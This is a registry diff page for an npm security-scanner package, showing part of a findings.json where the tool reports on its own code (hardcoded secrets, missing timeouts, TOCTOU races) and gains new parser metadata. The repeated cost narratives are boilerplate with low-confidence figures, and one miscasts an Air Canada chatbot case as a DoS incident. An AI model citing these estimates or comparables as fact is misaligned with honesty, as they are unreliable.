@clear-capabilities/agentic-security-scanner 0.76.1 → 0.78.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (108) hide show
  1. package/bin/.agentic-security/findings.json +320 -9
  2. package/bin/.agentic-security/last-scan.json +320 -9
  3. package/bin/.agentic-security/last-scan.json.sig +1 -1
  4. package/bin/.agentic-security/scan-history.json +17 -377
  5. package/bin/.agentic-security/streak.json +11 -16
  6. package/bin/agentic-security.js +33 -2
  7. package/dist/178.index.js +1 -1
  8. package/dist/384.index.js +1 -1
  9. package/dist/637.index.js +1 -1
  10. package/dist/718.index.js +106 -0
  11. package/dist/824.index.js +126 -0
  12. package/dist/838.index.js +1 -1
  13. package/dist/agentic-security.mjs +32 -32
  14. package/dist/agentic-security.mjs.sha256 +1 -1
  15. package/package.json +7 -7
  16. package/src/.agentic-security/findings.json +5731 -3933
  17. package/src/.agentic-security/last-scan.json +5731 -3933
  18. package/src/.agentic-security/last-scan.json.sig +1 -1
  19. package/src/.agentic-security/scan-history.json +2533 -887
  20. package/src/.agentic-security/streak.json +11 -16
  21. package/src/dataflow/.agentic-security/findings.json +52 -24
  22. package/src/dataflow/.agentic-security/last-scan.json +52 -24
  23. package/src/dataflow/.agentic-security/last-scan.json.sig +1 -1
  24. package/src/dataflow/.agentic-security/scan-history.json +101 -134
  25. package/src/dataflow/.agentic-security/streak.json +8 -10
  26. package/src/dataflow/async-sequencing.js +16 -7
  27. package/src/dataflow/builtin-summaries.js +131 -0
  28. package/src/dataflow/catalog.js +107 -0
  29. package/src/dataflow/cross-repo.js +75 -1
  30. package/src/dataflow/engine.js +129 -0
  31. package/src/dataflow/implicit-flow.js +24 -6
  32. package/src/dataflow/stub-aware-filter.js +69 -11
  33. package/src/dataflow/summaries.js +28 -3
  34. package/src/engine-parallel.js +70 -0
  35. package/src/engine.js +165 -15
  36. package/src/ir/.agentic-security/findings.json +757 -16
  37. package/src/ir/.agentic-security/last-scan.json +757 -16
  38. package/src/ir/.agentic-security/last-scan.json.sig +1 -1
  39. package/src/ir/.agentic-security/scan-history.json +545 -138
  40. package/src/ir/.agentic-security/streak.json +11 -13
  41. package/src/ir/index.js +22 -1
  42. package/src/ir/parser-go.js +403 -0
  43. package/src/ir/parser-js.js +2 -0
  44. package/src/ir/parser-php.js +330 -0
  45. package/src/ir/parser-py.helper.py +137 -11
  46. package/src/ir/parser-rb.js +309 -0
  47. package/src/posture/.agentic-security/findings.json +407 -84
  48. package/src/posture/.agentic-security/last-scan.json +407 -84
  49. package/src/posture/.agentic-security/last-scan.json.sig +1 -1
  50. package/src/posture/.agentic-security/scan-history.json +16 -4923
  51. package/src/posture/.agentic-security/streak.json +10 -14
  52. package/src/posture/calibration.js +14 -0
  53. package/src/posture/triage.js +13 -0
  54. package/src/report/.agentic-security/findings.json +6 -5
  55. package/src/report/.agentic-security/last-scan.json +6 -5
  56. package/src/report/.agentic-security/last-scan.json.sig +1 -1
  57. package/src/report/.agentic-security/scan-history.json +3 -300
  58. package/src/report/.agentic-security/streak.json +7 -8
  59. package/src/report/index.js +23 -2
  60. package/src/sast/.agentic-security/findings.json +195 -56
  61. package/src/sast/.agentic-security/last-scan.json +195 -56
  62. package/src/sast/.agentic-security/last-scan.json.sig +1 -1
  63. package/src/sast/.agentic-security/scan-history.json +14 -394
  64. package/src/sast/.agentic-security/streak.json +10 -13
  65. package/src/sast/cache-poisoning.js +77 -0
  66. package/src/sast/comparison-safety.js +73 -0
  67. package/src/sast/db-taint.js +54 -0
  68. package/src/sast/graphql.js +127 -0
  69. package/src/sast/llm-stored-prompt.js +57 -0
  70. package/src/sast/mutation-xss.js +43 -0
  71. package/src/sast/nosql-injection.js +5 -0
  72. package/src/sast/null-byte-injection.js +76 -0
  73. package/src/sast/redos-nfa.js +338 -0
  74. package/src/sast/sensitive-data-logging.js +73 -0
  75. package/src/sast/weak-password-hash.js +77 -0
  76. package/src/sast/weak-randomness.js +100 -0
  77. package/src/sca/.agentic-security/findings.json +502 -11
  78. package/src/sca/.agentic-security/last-scan.json +502 -11
  79. package/src/sca/.agentic-security/last-scan.json.sig +1 -1
  80. package/src/sca/.agentic-security/scan-history.json +19 -1
  81. package/src/sca/.agentic-security/streak.json +6 -6
  82. package/src/sca/llm-function-extract.js +107 -0
  83. package/src/sca/vendor-detect.js +91 -0
  84. package/dist/218.index.js +0 -793
  85. package/dist/601.index.js +0 -1038
  86. package/dist/634.index.js +0 -1892
  87. package/src/integrations/.agentic-security/findings.json +0 -1504
  88. package/src/integrations/.agentic-security/last-scan.json +0 -1504
  89. package/src/integrations/.agentic-security/scan-history.json +0 -40
  90. package/src/integrations/.agentic-security/streak.json +0 -21
  91. package/src/llm-validator/.agentic-security/findings.json +0 -1891
  92. package/src/llm-validator/.agentic-security/last-scan.json +0 -1891
  93. package/src/llm-validator/.agentic-security/last-scan.json.sig +0 -1
  94. package/src/llm-validator/.agentic-security/scan-history.json +0 -168
  95. package/src/llm-validator/.agentic-security/streak.json +0 -20
  96. package/src/lsp/.agentic-security/findings.json +0 -28
  97. package/src/lsp/.agentic-security/last-scan.json +0 -28
  98. package/src/lsp/.agentic-security/scan-history.json +0 -79
  99. package/src/lsp/.agentic-security/streak.json +0 -22
  100. package/src/mcp/.agentic-security/findings.json +0 -8403
  101. package/src/mcp/.agentic-security/last-scan.json +0 -8403
  102. package/src/mcp/.agentic-security/last-scan.json.sig +0 -1
  103. package/src/mcp/.agentic-security/scan-history.json +0 -1182
  104. package/src/mcp/.agentic-security/streak.json +0 -22
  105. package/src/sast/bench-shape/.agentic-security/findings.json +0 -28
  106. package/src/sast/bench-shape/.agentic-security/last-scan.json +0 -28
  107. package/src/sast/bench-shape/.agentic-security/scan-history.json +0 -24
  108. package/src/sast/bench-shape/.agentic-security/streak.json +0 -22
package/src/posture/.agentic-security/findings.json CHANGED
@@ -1,7 +1,7 @@
1
1
  {
2
- "scanId": "f293f70c-5c2c-4047-8616-a06df84df107",
3
- "startedAt": "2026-05-20T15:34:19.073Z",
4
- "durationMs": 1144,
2
+ "scanId": "997198bb-2db8-40c6-93c5-53c52cd42d9b",
3
+ "startedAt": "2026-05-27T11:19:52.727Z",
4
+ "durationMs": 1095,
5
5
  "scanned": {
6
6
  "files": 98,
7
7
  "lines": 0
@@ -86,7 +86,9 @@
86
86
  "comparable": "AWS keys leaked: avg $200k crypto-mining bill in <48h; OpenAI keys: $30–100k overnight",
87
87
  "confidence": "low",
88
88
  "narrative": "Hardcoded Secret on `attack-playbooks.js:91` could expose production credentials and API keys. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $24k · likely $138k · worst $778k. Dominant driver: legal counsel. Comparable: AWS keys leaked: avg $200k crypto-mining bill in <48h; OpenAI keys: $30–100k overnight."
89
- }
89
+ },
90
+ "parser": "LOGIC",
91
+ "family": null
90
92
  },
91
93
  {
92
94
  "id": "f813e80ea9dc10f8",
@@ -167,7 +169,9 @@
167
169
  "comparable": "AWS keys leaked: avg $200k crypto-mining bill in <48h; OpenAI keys: $30–100k overnight",
168
170
  "confidence": "low",
169
171
  "narrative": "Hardcoded Secret on `mitigation-composite.js:27` could expose production credentials and API keys. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $24k · likely $138k · worst $778k. Dominant driver: legal counsel. Comparable: AWS keys leaked: avg $200k crypto-mining bill in <48h; OpenAI keys: $30–100k overnight."
170
- }
172
+ },
173
+ "parser": "LOGIC",
174
+ "family": null
171
175
  },
172
176
  {
173
177
  "id": "struct:deploy-platform.js:13:Synchronous_Blocking_I/O_(DoS_Risk_in_Server_Context)",
@@ -280,6 +284,7 @@
280
284
  "unvalidated": true,
281
285
  "cross_language": false,
282
286
  "family": "dos-sync-io",
287
+ "parser": "STRUCTURAL",
283
288
  "_unsigned": false,
284
289
  "_passThroughSigning": false,
285
290
  "signatureStatus": "verified",
@@ -513,6 +518,7 @@
513
518
  "unvalidated": true,
514
519
  "cross_language": false,
515
520
  "family": "dos-sync-io",
521
+ "parser": "STRUCTURAL",
516
522
  "_unsigned": false,
517
523
  "_passThroughSigning": false,
518
524
  "signatureStatus": "verified",
@@ -739,6 +745,7 @@
739
745
  "unvalidated": true,
740
746
  "cross_language": false,
741
747
  "family": "state-machine-bypass",
748
+ "parser": "STATE-MACHINE",
742
749
  "_unsigned": false,
743
750
  "_passThroughSigning": false,
744
751
  "signatureStatus": "verified",
@@ -918,6 +925,7 @@
918
925
  "unvalidated": true,
919
926
  "cross_language": false,
920
927
  "family": "state-machine-bypass",
928
+ "parser": "STATE-MACHINE",
921
929
  "_unsigned": false,
922
930
  "_passThroughSigning": false,
923
931
  "signatureStatus": "verified",
@@ -1097,6 +1105,7 @@
1097
1105
  "unvalidated": true,
1098
1106
  "cross_language": false,
1099
1107
  "family": "state-machine-bypass",
1108
+ "parser": "STATE-MACHINE",
1100
1109
  "_unsigned": false,
1101
1110
  "_passThroughSigning": false,
1102
1111
  "signatureStatus": "verified",
@@ -1276,6 +1285,7 @@
1276
1285
  "unvalidated": true,
1277
1286
  "cross_language": false,
1278
1287
  "family": "state-machine-bypass",
1288
+ "parser": "STATE-MACHINE",
1279
1289
  "_unsigned": false,
1280
1290
  "_passThroughSigning": false,
1281
1291
  "signatureStatus": "verified",
@@ -1455,6 +1465,7 @@
1455
1465
  "unvalidated": true,
1456
1466
  "cross_language": false,
1457
1467
  "family": "state-machine-bypass",
1468
+ "parser": "STATE-MACHINE",
1458
1469
  "_unsigned": false,
1459
1470
  "_passThroughSigning": false,
1460
1471
  "signatureStatus": "verified",
@@ -1634,6 +1645,7 @@
1634
1645
  "unvalidated": true,
1635
1646
  "cross_language": false,
1636
1647
  "family": "state-machine-bypass",
1648
+ "parser": "STATE-MACHINE",
1637
1649
  "_unsigned": false,
1638
1650
  "_passThroughSigning": false,
1639
1651
  "signatureStatus": "verified",
@@ -1813,6 +1825,7 @@
1813
1825
  "unvalidated": true,
1814
1826
  "cross_language": false,
1815
1827
  "family": "state-machine-bypass",
1828
+ "parser": "STATE-MACHINE",
1816
1829
  "_unsigned": false,
1817
1830
  "_passThroughSigning": false,
1818
1831
  "signatureStatus": "verified",
@@ -1992,6 +2005,7 @@
1992
2005
  "unvalidated": true,
1993
2006
  "cross_language": false,
1994
2007
  "family": "state-machine-bypass",
2008
+ "parser": "STATE-MACHINE",
1995
2009
  "_unsigned": false,
1996
2010
  "_passThroughSigning": false,
1997
2011
  "signatureStatus": "verified",
@@ -2171,6 +2185,7 @@
2171
2185
  "unvalidated": true,
2172
2186
  "cross_language": false,
2173
2187
  "family": "state-machine-bypass",
2188
+ "parser": "STATE-MACHINE",
2174
2189
  "_unsigned": false,
2175
2190
  "_passThroughSigning": false,
2176
2191
  "signatureStatus": "verified",
@@ -2325,7 +2340,9 @@
2325
2340
  "comparable": "Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage",
2326
2341
  "confidence": "low",
2327
2342
  "narrative": "Missing Timeout on Outbound HTTP Request (DoS) on `adversary-agent.js:117` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage."
2328
- }
2343
+ },
2344
+ "parser": "LOGIC",
2345
+ "family": null
2329
2346
  },
2330
2347
  {
2331
2348
  "id": "3d7f5144e9ce1781",
@@ -2406,7 +2423,9 @@
2406
2423
  "comparable": "Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage",
2407
2424
  "confidence": "low",
2408
2425
  "narrative": "Missing Timeout on Outbound HTTP Request (DoS) on `adversary-agent.js:146` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage."
2409
- }
2426
+ },
2427
+ "parser": "LOGIC",
2428
+ "family": null
2410
2429
  },
2411
2430
  {
2412
2431
  "id": "7d793329125fa392",
@@ -2487,7 +2506,9 @@
2487
2506
  "comparable": "Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage",
2488
2507
  "confidence": "low",
2489
2508
  "narrative": "Missing Timeout on Outbound HTTP Request (DoS) on `adversary-agent.js:154` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage."
2490
- }
2509
+ },
2510
+ "parser": "LOGIC",
2511
+ "family": null
2491
2512
  },
2492
2513
  {
2493
2514
  "id": "logic:agents-memory.js:44:TOCTOU:_existsSync_followed_by_file_op",
@@ -2568,7 +2589,9 @@
2568
2589
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
2569
2590
  "confidence": "low",
2570
2591
  "narrative": "TOCTOU: existsSync followed by file op on `agents-memory.js:44` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
2571
- }
2592
+ },
2593
+ "parser": "LOGIC",
2594
+ "family": null
2572
2595
  },
2573
2596
  {
2574
2597
  "id": "logic:agents-memory.js:69:TOCTOU:_existsSync_followed_by_file_op",
@@ -2649,7 +2672,9 @@
2649
2672
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
2650
2673
  "confidence": "low",
2651
2674
  "narrative": "TOCTOU: existsSync followed by file op on `agents-memory.js:69` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
2652
- }
2675
+ },
2676
+ "parser": "LOGIC",
2677
+ "family": null
2653
2678
  },
2654
2679
  {
2655
2680
  "id": "logic:agents-memory.js:107:TOCTOU:_existsSync_followed_by_file_op",
@@ -2730,7 +2755,9 @@
2730
2755
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
2731
2756
  "confidence": "low",
2732
2757
  "narrative": "TOCTOU: existsSync followed by file op on `agents-memory.js:107` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
2733
- }
2758
+ },
2759
+ "parser": "LOGIC",
2760
+ "family": null
2734
2761
  },
2735
2762
  {
2736
2763
  "id": "logic:auth-posture-import.js:53:TOCTOU:_existsSync_followed_by_file_op",
@@ -2811,7 +2838,9 @@
2811
2838
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
2812
2839
  "confidence": "low",
2813
2840
  "narrative": "TOCTOU: existsSync followed by file op on `auth-posture-import.js:53` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
2814
- }
2841
+ },
2842
+ "parser": "LOGIC",
2843
+ "family": null
2815
2844
  },
2816
2845
  {
2817
2846
  "id": "logic:calibration-drift.js:39:TOCTOU:_existsSync_followed_by_file_op",
@@ -2892,7 +2921,9 @@
2892
2921
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
2893
2922
  "confidence": "low",
2894
2923
  "narrative": "TOCTOU: existsSync followed by file op on `calibration-drift.js:39` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
2895
- }
2924
+ },
2925
+ "parser": "LOGIC",
2926
+ "family": null
2896
2927
  },
2897
2928
  {
2898
2929
  "id": "logic:cve-alert-daemon.js:271:TOCTOU:_existsSync_followed_by_file_op",
@@ -2973,7 +3004,9 @@
2973
3004
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
2974
3005
  "confidence": "low",
2975
3006
  "narrative": "TOCTOU: existsSync followed by file op on `cve-alert-daemon.js:271` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
2976
- }
3007
+ },
3008
+ "parser": "LOGIC",
3009
+ "family": null
2977
3010
  },
2978
3011
  {
2979
3012
  "id": "logic:cve-alert-daemon.js:289:TOCTOU:_existsSync_followed_by_file_op",
@@ -3054,7 +3087,9 @@
3054
3087
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3055
3088
  "confidence": "low",
3056
3089
  "narrative": "TOCTOU: existsSync followed by file op on `cve-alert-daemon.js:289` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3057
- }
3090
+ },
3091
+ "parser": "LOGIC",
3092
+ "family": null
3058
3093
  },
3059
3094
  {
3060
3095
  "id": "98b34a187b2233f4",
@@ -3135,7 +3170,9 @@
3135
3170
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3136
3171
  "confidence": "low",
3137
3172
  "narrative": "Known-Broken Code Marker Near Security-Sensitive Logic on `cve-lookup.js:64` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3138
- }
3173
+ },
3174
+ "parser": "LOGIC",
3175
+ "family": null
3139
3176
  },
3140
3177
  {
3141
3178
  "id": "logic:cve-lookup.js:32:TOCTOU:_existsSync_followed_by_file_op",
@@ -3216,7 +3253,9 @@
3216
3253
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3217
3254
  "confidence": "low",
3218
3255
  "narrative": "TOCTOU: existsSync followed by file op on `cve-lookup.js:32` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3219
- }
3256
+ },
3257
+ "parser": "LOGIC",
3258
+ "family": null
3220
3259
  },
3221
3260
  {
3222
3261
  "id": "logic:deterministic.js:53:TOCTOU:_existsSync_followed_by_file_op",
@@ -3297,7 +3336,9 @@
3297
3336
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3298
3337
  "confidence": "low",
3299
3338
  "narrative": "TOCTOU: existsSync followed by file op on `deterministic.js:53` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3300
- }
3339
+ },
3340
+ "parser": "LOGIC",
3341
+ "family": null
3301
3342
  },
3302
3343
  {
3303
3344
  "id": "6f8230ef374727c1",
@@ -3378,7 +3419,9 @@
3378
3419
  "comparable": "Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage",
3379
3420
  "confidence": "low",
3380
3421
  "narrative": "Missing Timeout on Outbound HTTP Request (DoS) on `epss.js:73` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage."
3381
- }
3422
+ },
3423
+ "parser": "LOGIC",
3424
+ "family": null
3382
3425
  },
3383
3426
  {
3384
3427
  "id": "logic:epss.js:34:TOCTOU:_existsSync_followed_by_file_op",
@@ -3459,7 +3502,9 @@
3459
3502
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3460
3503
  "confidence": "low",
3461
3504
  "narrative": "TOCTOU: existsSync followed by file op on `epss.js:34` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3462
- }
3505
+ },
3506
+ "parser": "LOGIC",
3507
+ "family": null
3463
3508
  },
3464
3509
  {
3465
3510
  "id": "logic:exploitability-probability.js:142:TOCTOU:_existsSync_followed_by_file_op",
@@ -3540,7 +3585,9 @@
3540
3585
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3541
3586
  "confidence": "low",
3542
3587
  "narrative": "TOCTOU: existsSync followed by file op on `exploitability-probability.js:142` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3543
- }
3588
+ },
3589
+ "parser": "LOGIC",
3590
+ "family": null
3544
3591
  },
3545
3592
  {
3546
3593
  "id": "logic:feature-flags.js:53:TOCTOU:_existsSync_followed_by_file_op",
@@ -3621,7 +3668,9 @@
3621
3668
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3622
3669
  "confidence": "low",
3623
3670
  "narrative": "TOCTOU: existsSync followed by file op on `feature-flags.js:53` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3624
- }
3671
+ },
3672
+ "parser": "LOGIC",
3673
+ "family": null
3625
3674
  },
3626
3675
  {
3627
3676
  "id": "logic:fix-history.js:25:TOCTOU:_existsSync_followed_by_file_op",
@@ -3702,7 +3751,9 @@
3702
3751
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3703
3752
  "confidence": "low",
3704
3753
  "narrative": "TOCTOU: existsSync followed by file op on `fix-history.js:25` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3705
- }
3754
+ },
3755
+ "parser": "LOGIC",
3756
+ "family": null
3706
3757
  },
3707
3758
  {
3708
3759
  "id": "logic:fix-history.js:42:TOCTOU:_existsSync_followed_by_file_op",
@@ -3783,7 +3834,9 @@
3783
3834
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3784
3835
  "confidence": "low",
3785
3836
  "narrative": "TOCTOU: existsSync followed by file op on `fix-history.js:42` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3786
- }
3837
+ },
3838
+ "parser": "LOGIC",
3839
+ "family": null
3787
3840
  },
3788
3841
  {
3789
3842
  "id": "4d1f25f2f49d3c36",
@@ -3864,7 +3917,9 @@
3864
3917
  "comparable": "Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage",
3865
3918
  "confidence": "low",
3866
3919
  "narrative": "Missing Timeout on Outbound HTTP Request (DoS) on `flow-narration.js:73` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage."
3867
- }
3920
+ },
3921
+ "parser": "LOGIC",
3922
+ "family": null
3868
3923
  },
3869
3924
  {
3870
3925
  "id": "logic:grader-calibration.js:34:TOCTOU:_existsSync_followed_by_file_op",
@@ -3945,7 +4000,9 @@
3945
4000
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
3946
4001
  "confidence": "low",
3947
4002
  "narrative": "TOCTOU: existsSync followed by file op on `grader-calibration.js:34` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
3948
- }
4003
+ },
4004
+ "parser": "LOGIC",
4005
+ "family": null
3949
4006
  },
3950
4007
  {
3951
4008
  "id": "logic:grader-calibration.js:41:TOCTOU:_existsSync_followed_by_file_op",
@@ -4026,7 +4083,9 @@
4026
4083
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4027
4084
  "confidence": "low",
4028
4085
  "narrative": "TOCTOU: existsSync followed by file op on `grader-calibration.js:41` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4029
- }
4086
+ },
4087
+ "parser": "LOGIC",
4088
+ "family": null
4030
4089
  },
4031
4090
  {
4032
4091
  "id": "logic:holdout-eval.js:53:TOCTOU:_existsSync_followed_by_file_op",
@@ -4107,7 +4166,9 @@
4107
4166
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4108
4167
  "confidence": "low",
4109
4168
  "narrative": "TOCTOU: existsSync followed by file op on `holdout-eval.js:53` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4110
- }
4169
+ },
4170
+ "parser": "LOGIC",
4171
+ "family": null
4111
4172
  },
4112
4173
  {
4113
4174
  "id": "logic:integrity.js:43:TOCTOU:_existsSync_followed_by_file_op",
@@ -4188,7 +4249,9 @@
4188
4249
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4189
4250
  "confidence": "low",
4190
4251
  "narrative": "TOCTOU: existsSync followed by file op on `integrity.js:43` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4191
- }
4252
+ },
4253
+ "parser": "LOGIC",
4254
+ "family": null
4192
4255
  },
4193
4256
  {
4194
4257
  "id": "logic:integrity.js:77:TOCTOU:_existsSync_followed_by_file_op",
@@ -4269,7 +4332,9 @@
4269
4332
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4270
4333
  "confidence": "low",
4271
4334
  "narrative": "TOCTOU: existsSync followed by file op on `integrity.js:77` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4272
- }
4335
+ },
4336
+ "parser": "LOGIC",
4337
+ "family": null
4273
4338
  },
4274
4339
  {
4275
4340
  "id": "logic:learning.js:30:TOCTOU:_existsSync_followed_by_file_op",
@@ -4350,7 +4415,9 @@
4350
4415
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4351
4416
  "confidence": "low",
4352
4417
  "narrative": "TOCTOU: existsSync followed by file op on `learning.js:30` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4353
- }
4418
+ },
4419
+ "parser": "LOGIC",
4420
+ "family": null
4354
4421
  },
4355
4422
  {
4356
4423
  "id": "logic:license-policy.js:30:TOCTOU:_existsSync_followed_by_file_op",
@@ -4431,7 +4498,9 @@
4431
4498
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4432
4499
  "confidence": "low",
4433
4500
  "narrative": "TOCTOU: existsSync followed by file op on `license-policy.js:30` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4434
- }
4501
+ },
4502
+ "parser": "LOGIC",
4503
+ "family": null
4435
4504
  },
4436
4505
  {
4437
4506
  "id": "068537d2082ff5e9",
@@ -4512,7 +4581,9 @@
4512
4581
  "comparable": "Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage",
4513
4582
  "confidence": "low",
4514
4583
  "narrative": "Missing Timeout on Outbound HTTP Request (DoS) on `llm-redteam.js:145` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Air Canada 2024 LLM chatbot DoS → court-ordered refunds + reputational damage."
4515
- }
4584
+ },
4585
+ "parser": "LOGIC",
4586
+ "family": null
4516
4587
  },
4517
4588
  {
4518
4589
  "id": "logic:network-policy-import.js:85:TOCTOU:_existsSync_followed_by_file_op",
@@ -4593,7 +4664,9 @@
4593
4664
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4594
4665
  "confidence": "low",
4595
4666
  "narrative": "TOCTOU: existsSync followed by file op on `network-policy-import.js:85` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4596
- }
4667
+ },
4668
+ "parser": "LOGIC",
4669
+ "family": null
4597
4670
  },
4598
4671
  {
4599
4672
  "id": "cdf48e92135085d0",
@@ -4674,7 +4747,9 @@
4674
4747
  "comparable": "Generic finding — likely cost driven by user count + jurisdiction stack",
4675
4748
  "confidence": "low",
4676
4749
  "narrative": "Weak Randomness on `poc-generator.js:67` could expose configuration / internal data. Context: general SaaS / no specific regulatory exposure. Estimated cost: best $23k · likely $136k · worst $775k. Dominant driver: legal counsel. Comparable: Generic finding — likely cost driven by user count + jurisdiction stack."
4677
- }
4750
+ },
4751
+ "parser": "LOGIC",
4752
+ "family": null
4678
4753
  },
4679
4754
  {
4680
4755
  "id": "afe969d251c2bd7c",
@@ -4755,7 +4830,9 @@
4755
4830
